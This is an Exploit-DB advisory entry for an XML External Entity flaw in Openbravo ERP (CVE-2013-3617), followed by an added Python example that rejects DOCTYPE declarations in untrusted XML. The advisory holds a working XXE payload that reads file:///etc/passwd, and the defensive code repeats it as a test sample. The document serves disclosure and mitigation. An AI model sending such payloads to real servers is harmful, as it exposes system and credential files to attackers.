- 18 Dec 2022
- EDB-ID
- 38818
- EDB verification
- Passed
- Author
- TOD BEARDSLEY
- Vulnerability type
- REMOTE
- Platform
- MULTIPLE
- CVE
- CVE-2013-3617
- Publication date
- 2013-10-30
Openbravo ERP - XML External Entity Information Disclosure
XML:
source: https://www.securityfocus.com/bid/63431/info
Openbravo ERP is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Openbravo ERP 2.5 and 3.0 are vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>
- Source
- www.exploit-db.com
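On the defensive side, a request like the one above can be rejected before any entity is resolved by refusing every DOCTYPE declaration in untrusted XML. The following is an added example, not code from Openbravo or from the advisory; the function names and both sample bodies are constructed, and it assumes the receiving service never needs a DTD in request bodies.

```python
import xml.parsers.expat


class ForbiddenXml(ValueError):
    """Raised when an untrusted XML body carries a DOCTYPE declaration."""


def parse_untrusted(body: bytes) -> dict:
    """Parse a request body with expat, aborting on the first DOCTYPE.

    Entities can only be declared inside a DOCTYPE, so refusing it removes
    internal, external and parameter entities in one step.
    Returns {element_name: text} for elements that contain text.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields, text = {}, []

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Fires before any <!ENTITY ...> line is processed.
        raise ForbiddenXml(f"DOCTYPE '{name}' not allowed in request body")

    def start(name, attrs):
        text.clear()

    def end(name):
        value = "".join(text).strip()
        if value:
            fields[name] = value
        text.clear()

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)
    return fields


# Constructed sample bodies (same element layout as the request above).
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<ob:Openbravo xmlns:ob="http://www.example.com">
<Product id="C970393BDF6C43E2B030D23482D88EED">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>fresh</comments>
</Product>
</ob:Openbravo>"""

WITH_DOCTYPE = BENIGN.replace(
    b"<ob:Openbravo",
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>\n<ob:Openbravo',
    1,
)
```

In a Java service the equivalent control is enabling the parser feature `http://apache.org/xml/features/disallow-doctype-decl` on the `DocumentBuilderFactory` or `SAXParserFactory` that handles the request.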